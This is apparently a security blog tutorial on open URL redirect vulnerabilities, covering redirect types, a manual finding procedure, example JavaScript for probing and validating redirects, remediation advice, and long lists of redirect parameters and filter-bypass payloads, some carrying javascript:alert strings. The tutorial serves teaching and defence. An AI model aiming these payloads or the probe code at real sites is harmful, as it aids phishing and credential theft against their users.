Open URL Redirection

Open URL Redirect

Open URL redirection, also known as "Unvalidated Redirects and Forwards", is a vulnerability that lets an attacker send users of your application to an untrusted external site. Redirection itself is a legitimate technique for sending a user to a different web page than the URL they requested; it becomes a vulnerability when the attacker gets to choose the destination.

An open redirection vulnerability exists when an attacker can control where a web application redirects a victim, allowing the attacker to send the victim to a malicious website under the attacker's control.

When this vulnerability arises

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way.

Unvalidated redirects and forwards are possible when a web application accepts untrusted input and redirects the request to a URL contained in that input.

By replacing that URL with one pointing at a malicious site, an attacker can launch a convincing phishing campaign, since the link the victim clicks begins with the legitimate domain, and steal user credentials.

An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

Types of URL redirection:

TYPE 1 — PARAMETER BASED URL REDIRECTION

Parameter-based URL redirection is the most common type and the easiest to spot. Two behaviours combine to produce it:

1. A GET parameter containing a URL or URI.

2. A 301/302 redirect issued to the value of that parameter.

TYPE 2 - SESSION RESTORATION URL REDIRECTION

Ever click a link within an application, only to find that your session has expired? Many applications preserve the URL the user was trying to reach and redirect to it after the user authenticates. The feature is useful, but it is a common source of URL redirection vulnerabilities. Eg:

1. https://example.com/login?returnUrl=/dashboard (a relative path on the application, as intended)

2. https://example.com/login?returnUrl=https://www.virtuesecurity.com (an absolute URL to another site; if the application follows it after login, it is an open redirect)

TYPE 3 — DOM BASED URL REDIRECTION

Remember that JavaScript can obtain data directly from the browser. For a URL such as https://example.com/#dashboard the browser does not send #dashboard to the application: the fragment stays client-side, where page script can read it from location.hash and use it as a redirect target. Because the server never sees the fragment, no server-side filter or log can catch this variant. You can verify this with Burp: the captured request for that URL contains no fragment.
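The DOM-based case above, as an added example that is not code from the original post: a hash-based "return to view" handler written first as a DOM-based open redirect and then hardened. window.location is replaced by a plain object so the code runs under Node without a browser; https://example.com and the #dashboard fragment come from the post, while the profile view, the naive check and all function names are assumed for the illustration.

```javascript
// Added example (not from the original post). window.location is stood in for
// by a plain object built with fakeLocation() so this runs under Node.

// Vulnerable: whatever follows '#' is handed to the navigation sink unchanged.
// "#dashboard" resolves to /dashboard, but "#//evil.com" resolves to
// https://evil.com/ because a scheme-relative URL keeps only the page's scheme.
function vulnerableHashRedirect(loc) {
  const target = loc.hash.slice(1);        // source: location.hash
  return new URL(target, loc.href).href;   // sink: location.assign(target)
}

// A common "fix" that still fails: require a leading slash. "//evil.com" and
// "/\evil.com" both start with "/", and browsers (and the WHATWG URL parser)
// treat the backslash as a slash in http(s) URLs.
function naiveCheckedRedirect(loc) {
  const target = loc.hash.slice(1);
  if (!target.startsWith('/')) return new URL('/', loc.href).href;
  return new URL(target, loc.href).href;
}

// Hardened: never treat the fragment as a URL. Map it onto a fixed set of
// in-app views (assumed here) and fall back to a default for anything else.
const KNOWN_VIEWS = new Map([
  ['dashboard', '/dashboard'],
  ['profile', '/accounts/profile'],
]);

function safeHashRoute(loc) {
  const view = loc.hash.slice(1);
  const path = KNOWN_VIEWS.get(view) || '/';
  return new URL(path, loc.origin).href;
}

// What the server sees for the same page URL: the fragment is dropped before
// the request leaves the browser, so the request target carries no "#...".
function requestTarget(href) {
  const u = new URL(href);
  return u.pathname + u.search;
}

// Constructed stand-in for window.location.
function fakeLocation(href) {
  const u = new URL(href);
  return { href: u.href, origin: u.origin, hash: u.hash };
}
```

Burp shows the same thing requestTarget shows: the request line for https://example.com/#//evil.com is simply GET / and the payload never leaves the client, which is why DOM-based redirects have to be found by reading the script, not by proxying traffic.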

How to find an open redirect? Example scenario 1

1. If the application has a user sign-in/sign-up feature, register a user and log in as that user.

2. Go to your user profile page, for example: example.com/accounts/profile

3. Copy the profile page's URL.

4. Log out, clear all cookies and go to the homepage of the site.

5. Paste the copied profile URL into the address bar.

6. If the site prompts for a login, check the address bar: you may find the login page carrying the original path in a redirect parameter, like the following. That parameter is the candidate; replace its value with a URL you control and check whether the post-login redirect follows it.

- https://vuln.me/login?next=/accounts/profile

- https://vuln.me/login?returnUrl=/accounts/profile
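The six manual steps above turned into a check, as an added example that is not code from the original post. Given the login URL the application bounced you to and the path you were trying to reach, findRedirectParams picks out the parameter(s) carrying that path, buildProbes rewrites each with the payload shapes used later in this post, and looksLikeOpenRedirect decides from a response's status and Location header whether the probe escaped the application's origin. vuln.me and the next parameter come from the post; evil.com, the stand-in login handler and all function names are constructed for the example, and nothing is sent over the network.

```javascript
// Added example (not from the original post). All hosts and the responder are
// constructed; no request is made.

const CANARY_HOST = 'evil.com'; // assumed attacker-controlled host

// Step 6: which query parameter carries the pre-login path? Match on the
// value rather than on a list of names so unusual parameter names are found.
function findRedirectParams(loginUrl, originalPath) {
  const hits = [];
  for (const [name, value] of new URL(loginUrl).searchParams) {
    if (value === originalPath) hits.push(name);
  }
  return hits;
}

// Payload shapes from the lists below, with {target} filled in. They go on the
// wire exactly as written (%2f%2f must not be percent-encoded a second time).
function payloadVariants(target) {
  return [
    `http://${target}`,
    `https://${target}`,
    `//${target}`,
    `/\\${target}`,
    `///${target}`,
    `%2f%2f${target}`,
  ];
}

function buildProbes(loginUrl, paramName, target = CANARY_HOST) {
  const u = new URL(loginUrl);
  return payloadVariants(target).map((payload) => {
    const pairs = [];
    for (const [k, v] of u.searchParams) {
      pairs.push(k === paramName ? `${k}=${payload}` : `${k}=${encodeURIComponent(v)}`);
    }
    return `${u.origin}${u.pathname}?${pairs.join('&')}`;
  });
}

// Classify one response. Only a 3xx with a Location header counts, and the
// header is resolved against the request URL the way a browser would, so
// "//evil.com" and "/\evil.com" are both recognised as leaving vuln.me.
function looksLikeOpenRedirect(requestUrl, status, headers, target = CANARY_HOST) {
  if (status < 300 || status > 399 || !headers.location) return false;
  try {
    return new URL(headers.location, requestUrl).hostname === target;
  } catch (e) {
    return false; // unparsable Location header: nothing a browser would follow
  }
}

// Run every probe for every candidate parameter through a responder and
// return the probe URLs that escaped. The responder is whatever performs the
// request; here it is a plain function so the example runs offline.
function scan(loginUrl, originalPath, responder, target = CANARY_HOST) {
  const flagged = [];
  for (const param of findRedirectParams(loginUrl, originalPath)) {
    for (const probe of buildProbes(loginUrl, param, target)) {
      const { status, headers } = responder(probe);
      if (looksLikeOpenRedirect(probe, status, headers, target)) flagged.push(probe);
    }
  }
  return flagged;
}

// Constructed stand-in for the target's login page: it accepts any "next"
// value that begins with "/" (a very common broken check) and answers 302.
function constructedVulnerableLogin(probeUrl) {
  const next = new URL(probeUrl).searchParams.get('next') || '/';
  const location = next.startsWith('/') ? next : '/';
  return { status: 302, headers: { location } };
}
```

Against the constructed handler, scan() flags the four probes whose value starts with a slash (//, /\, /// and the decoded %2f%2f form) and clears the two absolute http(s) URLs, which is exactly the split a "must start with /" check produces in practice. To use this against a real target, replace constructedVulnerableLogin with a function that performs the request without following redirects and returns the status and headers.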

Possible open redirect parameters and payloads

Replace {target} with the URL or IP address you control.

http://www.example.com/function.jsp?fwd=admin.jsp

?url=http://{target}

?url=https://{target}

?url=//{target}

?url=%2f%2f{target}

?next=http://{target}

?next=https://{target}

?next=//{target}

?next=%2f%2f{target}

/redirect/{target}

/cgi-bin/redirect.cgi?{target}

/out/{target}

/out?{target}

/out?/{target}

/out?//{target}

/out?/\{target}

/out?///{target}

?view={target}

?view=/{target}

?view=//{target}

?view=/\{target}

?view=///{target}

/login?to={target}

/login?to=/{target}

/login?to=//{target}

/login?to=/\{target}

/login?to=///{target}

Open redirect bypass payloads

Replace targetwebapp.com, www.whitelisteddomain.tld, example.com or localdomain.pw with the specific URL or IP address: localdomain.pw, example.com and targetwebapp.com stand for the host you control, www.whitelisteddomain.tld for a domain the application trusts.

/%09/targetwebapp.com

/%5ctargetwebapp.com

//www.targetwebapp.com

/%2f%2e%2e//www.targetwebapp.com

/%2e%2e//targetwebapp.com

///targetwebapp.com

/%2f..//\targetwebapp.com

/\victim.com:80%40targetwebapp.com

/%2f%2f%2fbing.com%2f%3fwww.omise.co

////%5cexample.com

///\;@example.com

////www.whitelisteddomain.tld@google.com

/%2f..//www.whitelisteddomain.tld@google.com

///%09/www.whitelisteddomain.tld@google.com

javascript:alert(1);

java%0d%0ascript%0d%0a:alert(0)

";alert(0);//

javascript://www.whitelisteddomain.tld?%a0alert%281%29

<>javascript:alert(1);

///example.com/%2e%2e%2f

//https://example.com/%2e%2e%2f

/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com

/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com

/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com

/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com

/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

https://www.whitelisteddomain.tld@localdomain.pw

////https://localdomain.pw

////localdomain.pw\@www.whitelisteddomain.tld

https://:@localdomain.pw\@www.whitelisteddomain.tld

http://localdomain.pw:80#@www.whitelisteddomain.tld/

http://localdomain.pw:80?@www.whitelisteddomain.tld/

http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/

http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/

http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/

http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/

//localdomain.pw\twww.whitelisteddomain.tld/

http://;@localdomain.pw

http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/

How to bypass filters?

If the filter strips periods, so that evil.com becomes evilcom, try writing your host as an IP address in decimal (dword) notation, which contains no period at all (127.0.0.1 is 2130706433, for example), or use one of the following:

1. https://vuln.me/login?next=https://vuln.me@evil.com (a naive "starts with our domain" check passes this, but everything before the @ is userinfo and the browser goes to evil.com)

2. https://vuln.me/login?next=http://evil%E3%80%82com (%E3%80%82 is the UTF-8 encoding of the ideographic full stop U+3002 "。"; a filter that blocks or strips "." never sees one, but the browser normalises it to an ordinary dot when it parses the host, so the request still goes to evil.com)

Remediation: open redirection

  • Whitelist the URLs that may be used as redirect targets (an allow-list, not a block-list of bad patterns).
  • Remove the redirection function from the application and replace links to it with direct links to the relevant target URLs.
  • Maintain a server-side list of all URLs that are permitted for redirection. Where an arbitrary URL must be accepted, parse it first and compare the parsed host against that list; string prefix and substring checks are exactly what the bypasses above defeat.
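The remediation list above as code, run against the bypass payloads from this post, as an added example that is not code from the original post or any project. It serves the parameter-based and session-restoration types as well: the three naive checks are the kind the bypass section defeats, and safeRedirectTarget is the server-side allow-list approach. vuln.me and evil.com come from the post; the allow-list contents, the attacker-subdomain payload (a closely related case that goes slightly beyond the post) and all function names are assumed. Payloads are shown as a server sees them after percent-decoding the query string, so /%09/evil.com appears with a real tab and evil%E3%80%82com with U+3002.

```javascript
// Added example (not from the original post). Hosts, allow-list and payload
// set are constructed for the illustration.

const APP_ORIGIN = 'https://vuln.me';
const ALLOWED_HOSTS = new Set(['vuln.me', 'www.vuln.me']); // assumed allow-list

const BYPASS_PAYLOADS = [
  'https://vuln.me@evil.com',  // userinfo: the browser goes to evil.com
  'https://vuln.me.evil.com',  // attacker subdomain that starts with the app host
  'http://evil\u3002com',      // evil%E3%80%82com decoded: U+3002 is normalised to "."
  '//evil.com',                // scheme-relative
  '/\\evil.com',               // browsers treat "\" as "/" in http(s) URLs
  '/\t/evil.com',              // /%09/evil.com decoded: browsers drop the tab, leaving //evil.com
  'Https://evil.com',          // case defeats a lowercase "https://" block-list
];

// Naive check 1: prefix match on the application's own URL.
function prefixCheck(input) {
  return input.startsWith(APP_ORIGIN) ? input : '/';
}

// Naive check 2: strip periods so that evil.com degrades to "evilcom".
function dotStrippingCheck(input) {
  return input.replace(/\./g, '');
}

// Naive check 3: block-list "http://", "https://" and a leading "//".
function blockListCheck(input) {
  const bad = input.includes('http://') || input.includes('https://') || input.startsWith('//');
  return bad ? '/' : input;
}

// Where does a browser land after "Location: <value>"? Resolve the value
// against the application origin exactly as the browser does.
function landingHost(locationValue) {
  try {
    return new URL(locationValue, APP_ORIGIN).hostname;
  } catch (e) {
    return null;
  }
}

// Payloads that still reach the attacker after a given check has run.
function escapes(check) {
  return BYPASS_PAYLOADS.filter((p) => {
    const host = landingHost(check(p));
    return host !== null && (host === 'evil.com' || host.endsWith('.evil.com'));
  });
}

// Hardened: parse first, decide on the parsed result. Returns an absolute URL
// on an allow-listed host, or null when the caller should fall back to a
// fixed default such as "/".
function safeRedirectTarget(input) {
  let u;
  try {
    u = new URL(input, APP_ORIGIN); // relative paths resolve onto vuln.me
  } catch (e) {
    return null;
  }
  if (u.protocol !== 'https:' && u.protocol !== 'http:') return null; // no javascript:/data:
  if (u.username !== '' || u.password !== '') return null;           // no userinfo tricks
  if (!ALLOWED_HOSTS.has(u.hostname)) return null;                  // exact host match only
  return u.href;
}
```

Run over the payload set, the prefix check lets two through (userinfo and attacker subdomain), the dot-stripping check one (U+3002) and the block-list three (backslash, tab and mixed-case scheme), while safeRedirectTarget returns null for every one of them and still accepts /accounts/profile. The key design choice is the order: parse with the same rules the browser uses, then judge the parsed host, so every encoding trick is resolved before the decision is made.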

Recommended open redirect bypass tool

- https://github.com/adelittle/aincurl


A white hat Hacker...!!!

Akash Venky
